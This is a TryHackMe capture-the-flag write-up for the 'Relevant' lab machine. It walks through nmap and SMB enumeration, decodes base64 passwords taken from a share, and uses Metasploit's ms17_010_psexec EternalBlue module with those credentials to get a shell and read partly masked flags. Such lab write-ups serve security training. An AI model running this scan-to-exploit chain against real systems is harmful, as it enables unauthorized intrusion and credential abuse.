TryHackMe | Relevant Write up

Attacking Windows machine using Eternal Blue vulnerability, Metasploit method.

Attack Summary:

• Searching open ports, I highly suggest that scan aggressively, -p- nmap option.
• Using Nmap Script Engine to identify port vulnerabilities especially in 445/SMB ports.
• Login SMB using the non-default user and download the base64 encode credentials.
• From Metasploit, use the ms17_010_psexec exploit together with the credentials.
• Gain user shell, enumerate further using winpeas and escalate your privilege once you found the vulnerability.

Enumeration

└─# nmap -sV -T4 -iL ip.txt| tee nmap.txt
Starting Nmap 7.91 ( https://nmap.org ) at 2022-05-03 22:36 EDT
Nmap scan report for 10.10.23.238
Host is up (0.28s latency).
Not shown: 995 filtered ports
PORT     STATE SERVICE       VERSION
80/tcp   open  http          Microsoft IIS httpd 10.0
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds  Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3389/tcp open  ms-wbt-server Microsoft Terminal Services
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.81 seconds

Port 80:

Microsoft IIS Default page.

Port 445:

Checking for SMB Shares using Nmap scripting engine.

nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse $IP
Host script results:
| smb-enum-shares: 
|   account_used: guest
|   \\10.10.23.238\ADMIN$: 
|     Type: STYPE_DISKTREE_HIDDEN
|     Comment: Remote Admin
|     Anonymous access: <none>
|     Current user access: <none>
|   \\10.10.23.238\C$: 
|     Type: STYPE_DISKTREE_HIDDEN
|     Comment: Default share
|     Anonymous access: <none>
|     Current user access: <none>
|   \\10.10.23.238\IPC$: 
|     Type: STYPE_IPC_HIDDEN
|     Comment: Remote IPC
|     Anonymous access: <none>
|     Current user access: READ/WRITE
|   \\10.10.23.238\nt4wrksv: 
|     Type: STYPE_DISKTREE
|     Comment: 
|     Anonymous access: <none>
|_    Current user access: READ/WRITE

We got some non default user: nt4wrksv. Let’s try to login and see what can we get.

smbclient -U nt4wrksv //10.10.121.37/nt4wrksv

It’s seems that we’re able to login.

Download the passwords.txt file.

This passwords.txt was encoded in base64.

└─# cat passwords.txt        
[User Passwords - Encoded]
Qm9iIC0gIVBAJCRXMHJEITEyMw==
QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk

Let’s decode it first.

Qm9iIC0gIVBAJCRXMHJEITEyMw==
Bob - !P@$$W0rD!123
QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk 
Bill - Juw4nnaM4n420696969!$$$

Now, What’s next?

Let’s go back to our nmap scan.

445/tcp  open  microsoft-ds  Microsoft Windows Server 2008 R2 - 2012 microsoft-ds

As we notice that the server is running Microsoft Windows Server 2008 R2. It’s probably Windows 7 OS.

So, It is worth checking a Eternal Blue vulnerability using nmap script engine:smb-vuln-ms17–010.nse.

└─# nmap -p 445 --script=smb-vuln-ms17-010.nse -iL ip.txt| tee nmapEBlue.txt
Starting Nmap 7.91 ( https://nmap.org ) at 2022-05-04 02:24 EDT
Nmap scan report for 10.10.218.219
Host is up (0.27s latency).
PORT    STATE SERVICE
445/tcp open  microsoft-ds
Host script results:
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|           
|     Disclosure date: 2017-03-14
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_      https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
Nmap done: 1 IP address (1 host up) scanned in 4.39 seconds

Upon confirming that it is vulnerable, we can use windows/smb/ms17_010_psexec exploit from metasploit.

use windows/smb/ms17_010_psexec
set RHOSTS 10.10.101.252
set LHOST tun0
set SMBUSER Bob
set SMBPASS !P@$$W0rD!123

Then we got a shell. Let’s get the user.txt

meterpreter> shell
C:\Users\Bob\Desktop>type user.txt
THM{fdk4ka34vk34***************}

Uploading winpeas.exe in Temp folder for further enumeration and to look other vulnerabilities to use for privilege escalation.

https://github.com/carlospolop/PEASS-ng/releases

Okay, let’s execute. :D

As we can see here, we’re already have an administrator privilege so let’s go and get the root.txt flag.

C:\Users\Administrator\Desktop>type root.txt
type root.txt
THM{1fk5kf469devly1gl**********}

Thank you for taking time to read, hope you find this one helpful. :D

If you have any suggestions, feel free to comment or message me in LinkedIn.